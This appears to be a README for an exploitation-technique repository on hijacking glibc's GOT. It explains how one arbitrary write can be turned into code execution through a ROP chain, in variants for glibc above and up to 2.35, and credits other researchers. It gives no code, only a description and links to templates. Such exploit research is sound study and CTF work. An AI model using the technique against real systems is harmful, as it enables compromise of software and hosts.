Libc-GOT-Hijacking
Transform arbitrary write to RCE.
This is a userspace attacking skill: If you can write arbitrary memory space, you can use this method to execute arbitrary code.
You only need to know the base address of Glibc
glibc > 2.35
Compared to glibc<=2.35 there is mitigation implemented, which forbids the methods for the old library. However, we desgined a method to bypass it and execute arbitrary code by once arbitrary write on Glibc's GOT table. This method performs Return Oriented Programming (ROP) attack on the Global Offset Table (GOT).
You can find details, templates, demos, and everything you want in: Details and Templates
glibc <= 2.35
I learned the original method from Sammy Hajhamid also the methods for glibc <=2.35 are inspired by his work.
Based on his work, We designed a method to execute arbitrary code by once arbitrary write on Glibc's GOT table. The method uses PLT_0 to push libc_exe_address to the stack and then use POP RSP, RET to execute our ROPchain.
You can find details, templates, demos, and everything you want in: Details and Templates
Acknowledgments
-
Great job @swing on the impressive work with glibc >2.35!
-
Appreciate the original work done by @pepsipu.
Reference link
Todo
- Provide the one_gadget version
- Only modify 0x10 bytes (gadget1 + one_gadget)
- Fix it for latest glibc